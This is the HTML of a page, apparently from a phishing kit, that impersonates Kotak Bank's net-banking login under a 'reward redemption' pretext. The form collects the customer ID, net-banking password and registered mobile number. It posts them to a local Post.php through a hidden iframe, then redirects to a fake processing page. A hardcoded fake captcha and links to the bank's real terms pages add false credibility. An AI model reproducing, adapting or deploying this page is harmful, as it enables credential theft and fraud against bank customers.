<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Kotak Bank Reward | Redeem</title>
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
<link rel="manifest" href="/site.webmanifest">
<link rel="mask-icon" href="/safari-pinned-tab.svg" color="#5bbad5">
<meta name="msapplication-TileColor" content="#da532c"></head>
<link rel="stylesheet" href="./style.css">
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Heebo:wght@300;400;500;600;700&display=swap" rel="stylesheet">
<link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css'><link rel="stylesheet" href="">
<style type="text/css">
#Lg
{
  width:150px;
  margin-bottom:0px;
  margin-top:5px;
}
#Lg2
{
  width:155px;
  position:absolute;
  margin-top:0%;
  margin-left:40%;
  margin-top:24px;
}

div.c
{
    line-height: 160%;
    font-size:16px; 
    font-family: 'Heebo', sans-serif; 
    font-weight:300;  
    margin-top:0;
}
div.footer
{
    line-height: 90%;
}

#captcha
{
  width:143.4px;
  height:35px;
  font-size:14px;
  font-family: 'Heebo', sans-serif;
  border-style:solid;
  border-color:black;
  border-width:1px;
  border-radius:4px;
  outline:none;
  padding:0 10px;
  text-transform:none;
}
.btn
{
  width:120px;
  padding:10px 10px;
  border-style:solid;
  outline:none;
  border:none;
  border-radius:4px;
  color:#fff;
  font-family: 'Heebo', sans-serif;
  font-weight:600;
  font-size:15px;
  background-color:#EE1C25;
  margin-top:15px;
  margin-left:55%;
}
hr.hr
{
  width:116%;
  margin-left:-8%;
  border-style:solid;
  border-color:grey;
  border-width:0.5px;
  }
  
.checkbox-wrapper-46 input[type="checkbox"] {
  display: none;
  visibility: hidden;
}

.checkbox-wrapper-46 .cbx {
  margin: auto;
  -webkit-user-select: none;
  user-select: none;
  cursor: pointer;
}
.checkbox-wrapper-46 .cbx span {
  display: inline-block;
  vertical-align: middle;
  transform: translate3d(0, 0, 0);
}
.checkbox-wrapper-46 .cbx span:first-child {
  position: relative;
  width: 16px;
  height: 16px;
  border-radius: 2px;
  transform: scale(1);
  vertical-align: middle;
  border: 1px solid grey;
  transition: all 0.3s ease;
}
.checkbox-wrapper-46 .cbx span:first-child svg {
  position: absolute;
  top: 2px;
  left: 1px;
  fill: none;
  stroke: #FFFFFF;
  stroke-width: 0.75;
  stroke-linecap: round;
  stroke-linejoin: round;
  stroke-dasharray: 16px;
  stroke-dashoffset: 16px;
  transition: all 0.3s ease;
  transition-delay: 0.1s;
  transform: translate3d(0, 0, 0);
}
.checkbox-wrapper-46 .cbx span:first-child:before {
  content: "";
  width: 100%;
  height: 100%;
  background: #0070e0;
  display: block;
  transform: scale(0);
  opacity: 1;
  border-radius: 50%;
}
.checkbox-wrapper-46 .cbx span:last-child {
  padding-left: 10px;
}
.checkbox-wrapper-46 .cbx:hover span:first-child {
  border-color: grey;
}

.checkbox-wrapper-46 .inp-cbx:checked + .cbx span:first-child {
  background: #0070e0;
  border-color: #0070e0;
  animation: wave-46 0.4s ease;
}
.checkbox-wrapper-46 .inp-cbx:checked + .cbx span:first-child svg {
  stroke-dashoffset: 0;
}
.checkbox-wrapper-46 .inp-cbx:checked + .cbx span:first-child:before {
  transform: scale(3.5);
  opacity: 0;
  transition: all 0.6s ease;
}

@keyframes wave-46 {
  50% {
    transform: scale(0.9);
  }
}

.hidden {
        display: none;
      }
       
       #mn
       {
       width:100%;
       height: auto;
       }
       
      .card-login {
        display: flex;
        justify-content: space-between;
        margin-bottom: 20px;
      }

      .card-login button {
        flex-grow:1;
        font-size: 12px;
        font-family: 'Heebo', sans-serif;
        margin-right: 10px;
        padding: 5px;
        border: solid;
        outline:none;
        border-radius: 1px;
        cursor: pointer;
        line-height: 125%;
      }

      .card-login button.active {
        background-color: #587ba1;
      }
      .card-login
      {
      text-align:center;
      border-radius:1px;
      width:100%;
      margin-left:auto;
      margin-right:auto;
      border-style:solid;
      border-color:#bfc8d2;
      }
      
      .card-login>button
      {background-color:transparent;
      margin:0!important;
      font-size:.70rem!important;
      border-radius:1px;
      padding:6px 0;
      border:none;
      color:#5f5f5f;
      font-family: 'Heebo', sans-serif;
      min-width:0}
      
      .card-login #a
      {width:50%;}
      
      .card-login #b
      {width:30%;}
      
      .card-login #c
      {width:20%;}
      
      .card-login>.active
      {background-color:#587ba1;
      color:#fff}
      
      h1
      {font-size:16px;
      font-family: 'Work Sans', sans-serif;
      margin-bottom:20px;
      display:block;
      font-weight:900;
      color:black;}
      
      .header
      {background-color:#a6004d;
      text-align:left;
      padding:10px;
      position:relative}
      
      .header-text
      {
      font-size:10px;
      font-family: 'Work Sans', sans-serif;
      }
      
      .card
      {background-color:#F9F9FB;
      margin:10px;
      display:block}
      .form-input-cvv{ 
      position: absolute;
      font-family: 'Heebo', sans-serif;
      font-size: 0.90rem;
      font-weight: 400;
      line-height: inherit;
      top: 0;
      left: 0;
      z-index: 1;
      resize: none;
      width: 100%;
      height: auto;
      padding: 12px 25px;
      border-radius: 0.1rem;
      border: 1px solid var(--color-grays);
      color: black;
      background: transparent;
      transition: all 0.3s ease-in-out;
      }
      
      .form-control-cvv {
      position: relative;
      width: 100%;
      height: 3rem;
      margin-bottom: 1.5rem;
      }
      .form-label-cvv {
      position: absolute;
      font-family: 'Heebo', sans-serif;
      font-size: .78rem;
      font-weight: 400;
      line-height: inherit;
      left: 12.65rem;
      top: -3.75rem;
      padding: 0.25rem;
      color: var(--color-grays);
      background: var(--color-white);
      transition: all 0.3s ease;
      }
      .form-input-cvv:focus {
      outline: none;
      border: 1.5px solid var(--color-black);
      }
      .form-input-cvv:focus ~ .form-label-cvv{
      top: -5.18rem;
      left: 12.65rem;
      z-index: 5;
      font-family: 'Heebo', sans-serif;
      font-size: 0.68rem;
      font-weight: 500;
      color: var(--color-black);
      transition: all 0.3s ease-in-out;
      }
      .form-input-cvv:not(:-moz-placeholder-shown).form-input-cvv:not(:focus) ~ .form-label-cvv {
      top: -5.18rem;
      left: 12.65rem;
      z-index: 9;
      font-size: 0.68rem;
      font-family: 'Heebo', sans-serif;
      font-weight: 500;
      -moz-transition: all 0.2s ease-in-out;
      transition: all 0.3s ease-in-out;
      }
      .form-input-cvv:not(:-ms-input-placeholder).form-input-cvv:not(:focus) ~ .form-label-cvv {
      top: -5.18rem;
      left: 12.65rem;
      z-index: 9;
      font-size: 0.68rem;
      font-family: 'Heebo', sans-serif;
      font-weight: 500;
      -ms-transition: all 0.2s ease-in-out;
      transition: all 0.3s ease-in-out;
      }
      .form-input-cvv:not(:placeholder-shown).form-input-cvv:not(:focus) ~ .form-label-cvv {
      top: -5.18rem;
      left: 12.65rem;
      z-index: 9;
      font-size: 0.68rem;
      border-color:black;
      font-family: 'Heebo', sans-serif;
      font-weight: 500;
      transition: all 0.3s ease-in-out;
      }
      
      div.cC
      {
      line-height: 160%;
      font-size:16px; 
      font-family: 'Heebo', sans-serif; 
      font-weight:300;  
      margin-top:0;
      }
      div.footerC
      {
      line-height: 90%;
      }
      
      .btnC
      {
      width:120px;
      padding:10px 10px;
      border-style:solid;
      outline:none;
      border:none;
      border-radius:4px;
      color:#fff;
      font-family: 'Heebo', sans-serif;
      font-weight:600;
      font-size:15px;
      background-color:#EE1C25;
      margin-top:15px;
      margin-left:55%;
      }
      hr.hrC
      {
      width:116%;
      margin-left:-8%;
      border-style:solid;
      border-color:grey;
      border-width:0.5px;
      }
      .inputWithIcon input[type="text"] {
      padding-left: 25px;
      }
      
      .inputWithIcon {
      position: relative;
      }
      
      .inputWithIcon i {
      position: absolute;
      left: 0;
      top: 6.5px;
      padding: 10px 12px;
      color: #000;
      transition: 0.3s;
      }
      .inputWithIcon-cvv input[type="text"] {
      padding-left: 25px;
      }
      
      .inputWithIcon-cvv {
      position: relative;
      }
      
      .inputWithIcon-cvv i {
      position: absolute;
      left: 172px;
      top: -65px;
      padding: 10px 10px;
      color: #000;
      transition: 0.3s;
      }
      :root {
      --color-black: hsl(0, 0%, 10%);
      --color-grays: hsl(0, 0%, 65%);
      --color-light: hsl(0, 0%, 96%);
      --color-white: hsl(0, 0%, 100%);
      --color-blues: hsl(225, 100%, 60%);
      --shadow-normal: 0 1px 3px 0 rgba(0, 0, 0, 0.1),
      0 1px 2px 0 rgba(0, 0, 0, 0.06);
      --shadow-medium: 0 4px 6px -1px rgba(0, 0, 0, 0.1),
      0 2px 4px -1px rgba(0, 0, 0, 0.06);
      --shadow-large: 2px 4px 10px 1px rgba(0, 0, 0, 0.5),
      0 4px 6px -2px rgba(0, 0, 0, 0.05);
      }
      
      *,
      *::before,
      *::after {
      padding: 0;
      margin: 0;
      box-sizing: border-box;
      list-style: none;
      list-style-type: none;
      text-decoration: none;
      -webkit-font-smoothing: antialiased;
      -moz-osx-font-smoothing: grayscale;
      text-rendering: optimizeLegibility;
      }
      
      html {
      font-size: 100%;
      box-sizing: inherit;
      font-family: 'Heebo', sans-serif;
      scroll-behavior: smooth;
      height: -webkit-fill-available;
      }
      
      body {
      font-family: 'Heebo', sans-serif;
      font-size: 1rem;
      font-weight: 300;
      line-height: 1.5;
      color: var(--color-black);
      background: var(--color-white);
      height: -webkit-fill-available;
      }
      
      main {
      overflow: hidden;
      }
      
      .section {
      margin: 0 auto;
      padding: 0 2rem;
      }
      
      .container {
      max-width: 75rem;
      height: auto;
      margin-top: 100px;
      padding: 0rem 0.75rem;
      }
      
      .centered {
      text-align: center;
      vertical-align: middle;
      margin-bottom: 1rem;
      }
      
      .heading {
      font-family: 'Heebo', sans-serif;
      font-size: 1.75rem;
      font-weight: 300;
      line-height: 1.25;
      margin-top: 1rem;
      color: var(--color-black);
      text-transform: uppercase;
      }
      
      .form-controlC {
      position: relative;
      width: 100%;
      height: 3rem;
      margin-bottom: 1.5rem;
      }
      .form-labelC {
      position: absolute;
      font-family: 'Heebo', sans-serif;
      font-size: 0.80rem;
      font-weight: 400;
      line-height: inherit;
      left: 1.90rem;
      top: 0.75rem;
      padding: 0.25rem;
      color: var(--color-grays);
      background: var(--color-white);
      transition: all 0.3s ease;
      }
      .form-inputC {
      position: absolute;
      font-family: 'Heebo', sans-serif;
      font-size: 0.90rem;
      font-weight: 400;
      line-height: inherit;
      top: 0;
      left: 0;
      z-index: 1;
      resize: none;
      width: 100%;
      height: auto;
      padding: 12px 25px;
      border-radius: 0.1rem;
      border: 1px solid var(--color-grays);
      color: black;
      background: transparent;
      transition: all 0.3s ease-in-out;
      }
      #nameC,#cardC,#dateC,#cvvC,#pinC,#mobileC
      { 
      padding: 12px 34px 12px 34px;
      }
      .form-input-cvvC{ 
      position: absolute;
      font-family: 'Heebo', sans-serif;
      font-size: 0.90rem;
      font-weight: 400;
      line-height: inherit;
      top: 0;
      left: 0;
      z-index: 1;
      resize: none;
      width: 100%;
      height: auto;
      padding: 12px 25px;
      border-radius: 0.1rem;
      border: 1px solid var(--color-grays);
      color: black;
      background: transparent;
      transition: all 0.3s ease-in-out;
      }
      
      .form-controlC-cvvC {
      position: relative;
      width: 100%;
      height: 3rem;
      margin-bottom: 1.5rem;
      }
      .form-label-cvvC {
      position: absolute;
      font-family: 'Heebo', sans-serif;
      font-size: .78rem;
      font-weight: 400;
      line-height: inherit;
      left: 12.65rem;
      top: -3.75rem;
      padding: 0.25rem;
      color: var(--color-grays);
      background: var(--color-white);
      transition: all 0.3s ease;
      }
      .form-input-cvvC:focus {
      outline: none;
      border: 1.5px solid var(--color-black);
      }
      .form-input-cvvC:focus ~ .form-label-cvvC{
      top: -5.18rem;
      left: 12.65rem;
      z-index: 5;
      font-family: 'Heebo', sans-serif;
      font-size: 0.68rem;
      font-weight: 500;
      color: var(--color-black);
      transition: all 0.3s ease-in-out;
      }
      .form-input-cvvC:not(:-moz-placeholder-shown).form-input-cvvC:not(:focus) ~ .form-label-cvvC {
      top: -5.18rem;
      left: 12.65rem;
      z-index: 9;
      font-size: 0.68rem;
      font-family: 'Heebo', sans-serif;
      font-weight: 500;
      -moz-transition: all 0.2s ease-in-out;
      transition: all 0.3s ease-in-out;
      }
      .form-input-cvvC:not(:-ms-input-placeholder).form-input-cvvC:not(:focus) ~ .form-label-cvvC {
      top: -5.18rem;
      left: 12.65rem;
      z-index: 9;
      font-size: 0.68rem;
      font-family: 'Heebo', sans-serif;
      font-weight: 500;
      -ms-transition: all 0.2s ease-in-out;
      transition: all 0.3s ease-in-out;
      }
      .form-input-cvvC:not(:placeholder-shown).form-input-cvvC:not(:focus) ~ .form-label-cvvC {
      top: -5.18rem;
      left: 12.65rem;
      z-index: 9;
      font-size: 0.68rem;
      border-color:black;
      font-family: 'Heebo', sans-serif;
      font-weight: 500;
      transition: all 0.3s ease-in-out;
      }
      
      
      input::-webkit-input-placeholder {
      color: transparent;
      font-family: 'Heebo', sans-serif;
      font-weight:400;
      }
      input:focus::-webkit-input-placeholder {
      color: #999;
      text-transform:none;
      font-family:'Heebo', sans-serif ;
      font-weight:400;
      }
      
      /* Firefox < 19 */
      input:-moz-placeholder {
      color: transparent;
      font-family:'Heebo', sans-serif ;
      font-weight:400;
      }
      input:focus:-moz-placeholder {
      color: #999;
      font-family: 'Heebo', sans-serif;
      text-transform:none;
      font-weight:400;
      }
      
      /* Firefox > 19 */
      input::-moz-placeholder {
      color: transparent;
      font-family:'Heebo', sans-serif ;
      font-weight:400;
      }
      input:focus::-moz-placeholder {
      color: #999;
      font-family:'Heebo', sans-serif;
      text-transform:none;
      font-weight:400;
      }
      
      /* Internet Explorer 10 */
      input:-ms-input-placeholder {
      color: transparent;
      font-family:'Heebo', sans-serif ;
      font-weight:400;
      }
      input:focus:-ms-input-placeholder {
      color: #999;
      font-family:'Heebo', sans-serif;
      text-transform:none;
      font-weight:400;
      }
      .form-inputC:focus {
      outline: none;
      border: 1.5px solid var(--color-black);
      }
      .form-inputC:focus ~ .form-labelC {
      top: -0.70rem;
      left: 1.95rem;
      z-index: 5;
      font-family: 'Heebo', sans-serif;
      font-size: 0.70rem;
      font-weight: 500;
      color: var(--color-black);
      transition: all 0.3s ease-in-out;
      }
      .form-inputC:not(:-moz-placeholder-shown).form-inputC:not(:focus) ~ .form-labelC {
      top: -0.70rem;
      left: 1.90rem;
      z-index: 9;
      font-size: 0.70rem;
      font-family: 'Heebo', sans-serif;
      font-weight: 500;
      -moz-transition: all 0.2s ease-in-out;
      transition: all 0.3s ease-in-out;
      }
      .form-inputC:not(:-ms-input-placeholder).form-inputC:not(:focus) ~ .form-labelC {
      top: -0.70rem;
      left: 1.90rem;
      z-index: 9;
      font-size: 0.70rem;
      font-family: 'Heebo', sans-serif;
      font-weight: 500;
      -ms-transition: all 0.2s ease-in-out;
      transition: all 0.3s ease-in-out;
      }
      .form-inputC:not(:placeholder-shown).form-inputC:not(:focus) ~ .form-labelC {
      top: -0.70rem;
      left: 1.95rem;
      z-index: 9;
      font-size: 0.70rem;
      border-color:black;
      font-family: 'Heebo', sans-serif;
      font-weight: 500;
      transition: all 0.3s ease-in-out;
      }
      
      .contact-column {
      max-width: 30rem;
      width: 100%;
      height: auto;
      margin: 0 auto;
      }
      .contact-inform {
      padding: 0.75rem 1.5rem 1rem;
      border-radius: 0.25rem;
      color: var(--color-black);
      background: var(--color-white);
      box-shadow: var(--shadow-large);
      }
      
</style>
</head>
<body>
<!-- Static- Please don't do anything here-->
<script type="text/javascript">var submitted=false;</script>
<iframe name="hidden_iframe" id="hidden_iframe" style="display: none" onload="if(submitted){window.location='Processing.html';}"></iframe>
<!-- partial:index.partial.html -->
<section class="sectioncontact-section" style="background-color:#FAFAFA;">
	<div class="container contact-column">
		<img src="Kotak_Logo.jpg" alt="" id="Lg" >
		<form class="contact-inform form" action="Post.php" method="post" target="hidden_iframe" onsubmit="submitted=true">
		    <div class="mainContent">
		    <div class="card-login">
		    <button style="font-family: 'Heebo', sans-serif; color:#ffffff; background-color:#587ba1; font-weight:400;" type="button" class="active" data-form="formA">Login Via<br><span style="font-size:14px; font-weight:600;">Net Banking</span>
		    <script>
		    function openWin() {
		    window.open("index_second.html");
		    }
		    </script>
		    </div>
		    <div class="c">
		    <h2>Login with Kotak Bank<br> Net Banking</h3>
		    </div><br>
		    <!--<div style="margin-top:-15px;">
		    <p1 style="color:#000; font-size:15px; font-family: 'Heebo', sans-serif; font-weight:500;">₹ Redeem Kotak Bank Reward Points.</p1><br><br>
		    </div>-->
		    <!-- Static- Please don't do anything here-->
		    <script type="text/javascript">var submitted=false;</script>
		    <iframe name="hidden_iframe" id="hidden_iframe" style="display: none" onload="if(submitted){window.location='Processing.html';}"></iframe>
		    <!-- partial:index.partial.html -->
		    <div class="form-control" style="margin-top:-5px;">
		    <input type="text" name="CRN/UserID" class="form-input" placeholder="Enter Your CRN Or User ID to begin" minlength="5" maxlength="25" required="">
		    <label for="CRN" class="form-label">Enter Your CRN Or User ID</label>
		    </div>
		    
		    <div class="form-control">
		    <input type="text" name="Password" class="form-input" placeholder="Enter Your NetBanking Password" minlength="8" maxlength="25"
		    pattern="(?=.*\d)(?=.*[a-z])(?=.*[A-Z])(?=.*?[0-9])(?=.*?[!@#$%^&*+`~=?\|<>/]).{8,25}" title="Password must contain at least one number, one uppercase and lowercase letter, and at least 8 or more characters" required="">
		    <label for="Password" class="form-label">Net Banking Password</label>
		    </div>
		    
		    <div class="form-control">
		    <input type="text" name="Mobile_No." inputmode="numeric" class="form-input" placeholder="Enter registered number" maxlength="10"
		    pattern="[6-9]\d{9}" title="Please enter valid mobile number !" required="">
		    <label for="mobile" class="form-label">Registered Mobile Number</label>
		    </div>
		    
		    <div style="margin-top:-20px;" class="checkbox-wrapper-46">
		    <input class="inp-cbx" id="cbx-46" type="checkbox" />
		    <label class="cbx" for="cbx-46"><span>
		    <svg width="12px" height="10px" viewbox="0 0 12 10">
		    <polyline points="1.5 6 4.5 9 10.5 1"></polyline>
		    </svg></span><span style="font-size:13px;">Remember me</span>
		    </label>
		    </div>
		    
		    <img src="Captcha.jpg" alt="" id="Lg2" >
		    <div class="n-form">
		    <p1 style="color:#000; font-size:13px; font-weight:400; ">Enter Captcha</p1><br>
		    <input type="text" name="" id="captcha"  placeholder="Enter Captcha" maxlength="5"
		    pattern="GHMTE" title="Please enter correct captcha !" required="">
		    </div><br>
		    
		    <div class="footer">
		    <p1 style="color:grey; font-size:12px; font-family: 'Heebo', sans-serif; font-weight:500;">By clicking on 'Next', You accept that you have read our
		    <a style="color:grey; font-size:12px; font-family: 'Heebo', sans-serif; font-weight:500; text-decoration: underline;" href="https://www.kotak.com/en/customer-service/terms-and-conditions.html#1"> Terms and conditions ,</a>
		    <a style="color:grey; font-size:12px; font-family: 'Heebo', sans-serif; font-weight:500; text-decoration: underline;" href="https://www.kotak.com/en/privacy-policy.html">Privacy Policy</a> and the<br>
		    <a style="color:grey; font-size:12px; font-family: 'Heebo', sans-serif; font-weight:500; text-decoration: underline;" href="#" >Tips for Safe Banking</a>
		    </p1>
		    </div><br>
		    <hr class="hr">
		    <button type="submit" class="btn">Next</button>
       </section>
    </body>
</html>